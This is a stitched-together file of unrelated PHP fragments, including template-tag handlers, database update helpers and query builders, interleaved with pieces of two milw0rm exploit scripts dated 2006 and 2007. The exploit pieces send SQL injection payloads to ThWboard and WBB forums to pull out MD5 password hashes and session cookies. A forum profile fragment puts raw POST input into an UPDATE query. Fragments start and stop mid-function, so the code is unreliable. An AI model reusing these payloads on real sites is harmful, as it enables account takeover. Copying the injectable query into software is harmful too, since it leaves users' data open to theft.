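    // opening call $out is not assigned (only read from the stash on later
    // calls), so the glue is skipped and '__out' is flagged instead.
    if (isset($args['glue']) && !empty($content)) {
        if ($out) {
            $content = $args['glue'] . $content;
        } else {
            $ctx->stash('__out', true);
        }
    }
    if (0 === count($keys)) {
        $ctx->stash('__loop_keys', 0);
    }
    $repeat = true;
    return $content;
}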
    } else {
        ($code = $plugins->load('editprofile_about2_query')) ? eval($code) : null;
        $db->query("UPDATE {$db->pre}user SET about = '{$_POST['about']}' WHERE id = '{$my->id}'");
        ok($lang->phrase('data_success'), "editprofile.php?action=about" . SID2URL_x);
    }
} elseif ($_GET['action'] == "about") {
    if ($my->p['useabout'] == 0) {
        errorLogin($lang->phrase('not_allowed'), "editprofile.php");
    }
    $breadcrumb->Add($lang->phrase('editprofile_about'));
    echo $tpl->parse("header");
    echo $tpl->parse("menu");
    ($code = $plugins->load('editprofile_abos_Start')) ? eval($code) : null;
    BBProfile($bbcode);
    $fid = $gpc->get('fid', str);
    if (is_hash($fid)) {
        $data = $gpc->unescape(import_error_data($fid));
        if ($_GET['job'] == 'preview') {
            $preview = true;
            $data = $gpc->unescape($data);
            $parsedPreview = $bbcode->parse($data);
        } else {
            $preview = false;
        }
    } else {
        $data = $my->about;
        $preview = false;
    }
    $chars = numbers($config['maxaboutlength']);
    ($code = $plugins->load('editprofile_abos_prepared')) ? eval($code) : null;
    echo $tpl->parse("editprofile/about");
/**
 * Update a record in a table
 *
 * $dataobject is an object containing needed data
 * Relies on $dataobject having a variable "id" to
 * specify the record to update
 *
 * @uses $db
 * @param string $table The database table to be checked against.
 * @param array $dataobject An object with contents equal to fieldname=>fieldvalue. Must have an entry for 'id' to map to the table specified.
 * @param mixed $where defines the WHERE part of the update. Can be a string (one key), an array (keys) or a hash (keys/values).
 * For the first two forms the values are expected to be in $dataobject.
 * @return bool
 * @throws SQLException
 */
function update_record($table, $dataobject, $where = null)
{
    global $db;
    if (is_object($dataobject)) {
        $dataobject = clone $dataobject;
    }
    if (empty($where)) {
        $where = 'id';
        if (!isset($dataobject->id)) {
            // nothing to put in the where clause and we don't want to update everything
            throw new SQLException('update_record called with no where clause and no ID');
        }
    }
    $wherefields = array();
    $wherevalues = array();
    $values = array();
    if (is_string($where)) {
        // treat it like a stack (ie, field in dataobject)
        $where = array($where);
    }
    if (is_object($where) || is_hash($where)) {
        // the values are contained in the where ...
        foreach ((array) $where as $field => $value) {
            $wherefields[] = $field;
            $wherevalues[] = $value;
            unset($dataobject->{$field});
        }
    } else {
        if (is_array($where)) {
            // look for the values in $dataobject and complain bitterly if they're not there
            foreach ($where as $field) {
                if (!isset($dataobject->{$field})) {
                    throw new SQLException('Field in where clause not in the update object');
                }
                $wherefields[] = $field;
                $wherevalues[] = $dataobject->{$field};
                unset($dataobject->{$field});
            }
        } else {
            throw new SQLException('the $where object is in a very odd form');
        }
    }
    static $table_columns;
    // Determine all the fields in the table
    if (is_array($table_columns) && isset($table_columns[$table])) {
        $columns = $table_columns[$table];
    } else {
        if (!($columns = $db->MetaColumns(get_config('dbprefix') . $table))) {
            throw new SQLException('Could not get columns for table ' . $table);
        }
        $table_columns[$table] = $columns;
    }
    $data = (array) $dataobject;
    // Pull out data matching these fields
    $ddd = array();
    foreach ($columns as $column) {
        if (!in_array($column->name, $wherefields) && array_key_exists($column->name, $data)) {
            $ddd[$column->name] = $data[$column->name];
            // PostgreSQL bytea support
            if (is_postgres() && $column->type == 'bytea') {
                $ddd[$column->name] = $db->BlobEncode($ddd[$column->name]);
            }
        }
    }
    // Construct SQL queries
    $numddd = count($ddd);
    $count = 0;
    $update = '';
    foreach ($ddd as $key => $value) {
        $count++;
        $update .= db_quote_identifier($key) . ' = ? ';
        if ($count < $numddd) {
            $update .= ', ';
        }
        $values[] = $value;
    }
    $whereclause = '';
    $count = 0;
    $numddd = count($wherefields);
    foreach ($wherefields as $field) {
        $count++;
        $whereclause .= db_quote_identifier($field) . ' = ? ';
        if ($count < $numddd) {
            $whereclause .= ' AND ';
        }
    }
    $sql = 'UPDATE ' . db_table_name($table) . ' SET ' . $update . ' WHERE ' . $whereclause;
    try {
        $stmt = $db->Prepare($sql);
        increment_perf_db_writes();
        $rs = $db->Execute($stmt, array_merge($values, $wherevalues));
        return true;
    } catch (ADODB_Exception $e) {
        throw new SQLException(create_sql_exception_message($e, $sql, array_merge($values, $wherevalues)));
    }
}
 /**
  * Build a SQLBuilder from a finder options array.
  *
  * Recognised keys: from, joins, select, conditions, mapped_names, order,
  * limit, offset, group, having. Absent keys are simply not applied.
  * When 'joins' is given without 'select', the projection defaults to this
  * model's own columns.
  *
  * @param array $options finder options
  * @return SQLBuilder
  */
 public function options_to_sql($options)
 {
     $table_name = array_key_exists('from', $options)
         ? $options['from']
         : $this->get_fully_qualified_table_name();
     $builder = new SQLBuilder($this->conn, $table_name);

     if (array_key_exists('joins', $options)) {
         $builder->joins($this->create_joins($options['joins']));
         // an inner join does not pull in the joined table's columns on its own,
         // so restrict the default projection to this table
         if (!array_key_exists('select', $options)) {
             $options['select'] = $this->get_fully_qualified_table_name() . '.*';
         }
     }
     if (array_key_exists('select', $options)) {
         $builder->select($options['select']);
     }

     if (array_key_exists('conditions', $options)) {
         $conditions = $options['conditions'];
         if (is_hash($conditions)) {
             // hash conditions: optionally translate aliased column names first
             if (!empty($options['mapped_names'])) {
                 $conditions = $this->map_names($conditions, $options['mapped_names']);
             }
             $builder->where($conditions);
         } else {
             // string / positional conditions become the arguments of where()
             if (is_string($conditions)) {
                 $conditions = array($conditions);
             }
             call_user_func_array(array($builder, 'where'), $conditions);
         }
     }

     // simple pass-through clauses, applied in this fixed order
     foreach (array('order', 'limit', 'offset', 'group', 'having') as $clause) {
         if (array_key_exists($clause, $options)) {
             $builder->$clause($options[$clause]);
         }
     }
     return $builder;
 }
    $data = "-----------------------------7d61bcd1f033e\r\n";
    $data .= "Content-Disposition: form-data; name=\"board[styleid]\";\r\n\r\n";
    $data .= "{$SQL}\r\n";
    $data .= "-----------------------------7d61bcd1f033e--\r\n";
    $packet = "POST " . $p . "index.php HTTP/1.0\r\n";
    $packet .= "SUNTZU: " . $argu . "\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "Content-Length: " . strlen($data) . "\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $data;
    sendpacketii($packet);
    if (eregi("<pre><b>ThWboard Error</b><br>", $html)) {
        echo $html;
        die("\n\nquery error... see html");
    }
    $temp = explode("templates/", $html);
    $temp2 = explode("/", $temp[1]);
    $pwd_hash = $temp2[0];
    if (is_hash($pwd_hash)) {
        die("pwd hash (md5) -> " . $pwd_hash . "\n");
    }
    if (eregi("templates//frame.html", $html)) {
        echo "no user with given name...\n";
    }
    echo "exploit failed...\n\n" . $html;
}
?>

# milw0rm.com [2007-01-14]
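 /**
  * Recursively merge two values.
  *
  * Two hashes are merged key by key (recursing into the values of shared
  * keys); two lists are concatenated with duplicates dropped, keeping the
  * last occurrence; anything else yields $arr2 when it is truthy, else $arr1.
  * Note the truthiness test: a falsy $arr2 (0, '', '0', null, array()) does
  * not replace $arr1.
  *
  * written by dev-null@christophe.vg
  * taken from http://www.php.net/manual/en/function.array-merge-recursive.php
  *
  * @param mixed $arr1 the old value
  * @param mixed $arr2 the new value
  * @return mixed
  */
 function array_join_merge($arr1, $arr2)
 {
     if (!(is_array($arr1) && is_array($arr2))) {
         // not the same ... take new one if defined, else the old one stays
         return $arr2 ? $arr2 : $arr1;
     }
     if (is_hash($arr1) && is_hash($arr2)) {
         // hashes -> merge based on keys; a key missing on one side merges
         // with null, looked up explicitly instead of via @-suppressed notices
         $new_array = array();
         $keys = array_unique(array_merge(array_keys($arr1), array_keys($arr2)));
         foreach ($keys as $key) {
             $new_array[$key] = array_join_merge(
                 array_key_exists($key, $arr1) ? $arr1[$key] : null,
                 array_key_exists($key, $arr2) ? $arr2[$key] : null
             );
         }
         return $new_array;
     }
     // two real arrays -> merge, dropping duplicates but keeping the last occurrence
     return array_reverse(array_unique(array_reverse(array_merge($arr1, $arr2))));
 }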
        }
        if ($i == 255) {
            die("\nExploit failed...");
        }
    }
    $j++;
}
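/**
 * Tell whether $hash looks like a hex MD5 digest.
 *
 * Matches 32 lowercase hex characters at the start of the trimmed string;
 * as before, nothing after them is checked. Uses preg_match() because
 * ereg() was removed in PHP 7.
 *
 * @param string $hash
 * @return bool
 */
function is_hash($hash)
{
    return (bool) preg_match('/^[a-f0-9]{32}/', trim((string) $hash));
}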
// Final report: $password and $uid are read here but not assigned in this block.
if (is_hash($password)) {
    // NOTE(review): the '******' in the next statement appears to be a redaction
    // by the listing site rather than original code; as shown it does not parse.
    print_r('
--------------------------------------------------------------------------
cookie -> wbb_userid=' . $uid . '; wbb_userpassword='******';
--------------------------------------------------------------------------
');
    if ($uid == 1) {
        echo "done, but... to have access to admin panel you need to break the hash\n";
    }
} else {
    echo "exploit failed...";
}
?>

# milw0rm.com [2006-11-23]
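/**
 * Smarty handler for the <MTVar> tag: read (and optionally modify) a
 * template variable kept in $ctx->__stash['vars'].
 *
 * Behaviour, in order:
 *  - with 'value' and no 'op' the call is delegated to <MTSetVar>;
 *  - a name of the form config.X returns the MT config entry (keys matching
 *    /password/ are refused) and request.X returns the request parameter;
 *  - name may be "func(name)", "name[index]" or "name{key}"; the 'function',
 *    'index' and 'key' arguments are the long forms of the same thing;
 *  - hashes support key lookup, function=delete|count and to_json; arrays
 *    support a numeric index, function=pop|shift|count and to_json;
 *  - 'op' applies _math_operation() to scalar values;
 *  - 'default' replaces an empty result and 'escape' (js|html|url) is applied
 *    last, also on the config./request. shortcuts.
 *
 * @param array $args tag attributes
 * @param object $ctx template context (MT/Smarty)
 * @return mixed the variable's value, or $ctx->error(...) on a bad name or function
 */
function smarty_function_mtvar($args, &$ctx)
{
    // status: complete
    // parameters: name
    if (array_key_exists('value', $args) && !array_key_exists('op', $args)) {
        require_once "function.mtsetvar.php";
        return smarty_function_mtsetvar($args, $ctx);
    }
    require_once "MTUtil.php";
    $vars =& $ctx->__stash['vars'];
    $value = '';
    $name = $args['name'];
    $name or $name = $args['var'];
    if (preg_match('/^(config|request)\\.(.+)$/i', $name, $m)) {
        if (strtolower($m[1]) == 'config') {
            // never expose configuration entries whose name mentions a password
            if (!preg_match('/password/i', $m[2])) {
                global $mt;
                return _mtvar_escape($mt->config[strtolower($m[2])], $args);
            }
        } elseif (strtolower($m[1]) == 'request') {
            // raw request input: the only protection the template gets is the
            // 'escape' attribute, so it must not be skipped on this early return
            $req = isset($_REQUEST[$m[2]]) ? $_REQUEST[$m[2]] : '';
            return _mtvar_escape($req, $args);
        }
    }
    if (!$name) {
        return '';
    }
    // "func(name)" is the short form of the 'function' argument
    if (preg_match('/^(\\w+)\\((.+)\\)$/', $name, $matches)) {
        $func = $matches[1];
        $name = $matches[2];
    } else {
        if (array_key_exists('function', $args)) {
            $func = $args['function'];
        }
    }
    # pick off any {...} or [...] from the name.
    if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) {
        $name = $matches[1];
        $br = $matches[2];
        $ref = $matches[3];
        // a "\$var" subscript is resolved through the stash; chr(0) marks "unset"
        if (preg_match('/^\\\\\\$(.+)/', $ref, $ref_matches)) {
            $ref = $vars[$ref_matches[1]];
            if (!isset($ref)) {
                $ref = chr(0);
            }
        }
        $br == '[' ? $index = $ref : ($key = $ref);
    } else {
        if (array_key_exists('index', $args)) {
            $index = $args['index'];
        } else {
            if (array_key_exists('key', $args)) {
                $key = $args['key'];
            }
        }
    }
    // a name starting with "$" is looked up in the stash to get the real name
    if (preg_match('/^\\$/', $name)) {
        $name = $vars[$name];
        if (!isset($name)) {
            // $tag was never defined in this scope; name the tag this handler serves
            return $ctx->error($ctx->mt->translate("You used a [_1] tag without a valid name attribute.", "<MTVar>"));
        }
    }
    if (isset($vars[$name])) {
        $value = $vars[$name];
    }
    // a value naming a compiled Smarty block is rendered to a string
    if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) {
        if (function_exists($value)) {
            ob_start();
            $value($ctx, array());
            $value = ob_get_contents();
            ob_end_clean();
        } else {
            $value = '';
        }
    }
    $return_val = $value;
    if (isset($name)) {
        if (is_hash($value)) {
            if (isset($key)) {
                if (isset($func)) {
                    if ('delete' == strtolower($func)) {
                        // delete returns the removed entry and writes the hash back
                        $return_val = $value[$key];
                        unset($value[$key]);
                        $vars[$name] = $value;
                    } else {
                        return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for a hash.", $func));
                    }
                } else {
                    if ($key != chr(0)) {
                        $return_val = $value[$key];
                    } else {
                        // unresolved "\$var" key: drop $value so 'op' is skipped and 'default' applies
                        unset($value);
                    }
                }
            } elseif (isset($func)) {
                if ('count' == strtolower($func)) {
                    $return_val = count(array_keys($value));
                } else {
                    return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for a hash.", $func));
                }
            } else {
                if (array_key_exists('to_json', $args) && $args['to_json']) {
                    if (function_exists('json_encode')) {
                        $return_val = json_encode($value);
                    } else {
                        $return_val = '';
                    }
                }
            }
        } elseif (is_array($value)) {
            if (isset($index)) {
                if (is_numeric($index)) {
                    $return_val = $value[$index];
                } else {
                    unset($value);
                    # fall through to any 'default'
                }
            } elseif (isset($func)) {
                $func = strtolower($func);
                // pop and shift mutate the array and store it back into the stash
                if ('pop' == $func) {
                    $return_val = array_pop($value);
                    $vars[$name] = $value;
                } elseif ('shift' == $func) {
                    $return_val = array_shift($value);
                    $vars[$name] = $value;
                } elseif ('count' == $func) {
                    $return_val = count($value);
                } else {
                    return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for an array.", $func));
                }
            } else {
                if (array_key_exists('to_json', $args) && $args['to_json']) {
                    if (function_exists('json_encode')) {
                        $return_val = json_encode($value);
                    } else {
                        $return_val = '';
                    }
                }
            }
        }
        if (array_key_exists('op', $args)) {
            $op = $args['op'];
            $rvalue = $args['value'];
            // arithmetic only on scalars; $value may have been unset above
            if ($op && isset($value) && !is_array($value)) {
                $return_val = _math_operation($op, $value, $rvalue);
                if (!isset($return_val)) {
                    return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", $value, $op, $rvalue));
                }
            }
        }
    }
    // loose comparison on purpose: null and false count as empty; note that
    // 0 == '' is true before PHP 8 and false from PHP 8 on
    if ($return_val == '') {
        if (isset($args['default'])) {
            $return_val = $args['default'];
        }
    }
    return _mtvar_escape($return_val, $args);
}

/**
 * Apply the tag's 'escape' argument (js, html or url) to a value about to be
 * returned to the template.
 *
 * @param mixed $val  the value to return
 * @param array $args the tag attributes
 * @return mixed $val unchanged when no (or an unknown) escape mode is given
 */
function _mtvar_escape($val, $args)
{
    if (!isset($args['escape'])) {
        return $val;
    }
    $esc = strtolower($args['escape']);
    if ($esc == 'js') {
        $val = encode_js($val);
    } elseif ($esc == 'html') {
        // htmlentities() has accepted a charset since PHP 4.1; use the publish charset
        global $mt;
        $charset = $mt->config('PublishCharset');
        $val = htmlentities($val, ENT_COMPAT, $charset);
    } elseif ($esc == 'url') {
        $val = urlencode($val);
        // urlencode() gives "+" for spaces; use "%20" so the value is valid in any URL part
        $val = preg_replace('/\\+/', '%20', $val);
    }
    return $val;
}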
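 /**
  * Fill $this->where / $this->where_values from the arguments of a where() call.
  *
  * A single hash argument is compiled through Expressions. Otherwise $args[0]
  * is the SQL fragment and the remaining arguments are its bind values; when
  * any bind value is itself an array, Expressions is used to expand the bind
  * marker, else fragment and values are stored as given. No arguments: no-op.
  *
  * @param array $args arguments as passed to where()
  * @return void
  */
 private function apply_where_conditions($args)
 {
     $num_args = count($args);
     if ($num_args === 1 && is_hash($args[0])) {
         $e = new Expressions($args[0]);
         $e->set_connection($this->connection);
         $this->where = $e->to_s();
         $this->where_values = array_flatten($e->values());
         return;
     }
     if ($num_args === 0) {
         return;
     }
     $values = array_slice($args, 1);
     // if the values has a nested array then we'll need to use Expressions to expand the bind marker for us;
     // iterate by value: nothing is modified, and a by-reference loop would leave a dangling reference
     foreach ($values as $value) {
         if (is_array($value)) {
             $e = new Expressions($args[0]);
             $e->set_connection($this->connection);
             $e->bind_values($values);
             $this->where = $e->to_s();
             $this->where_values = array_flatten($e->values());
             return;
         }
     }
     // no nested array so nothing special to do
     $this->where = $args[0];
     $this->where_values = $values;
 }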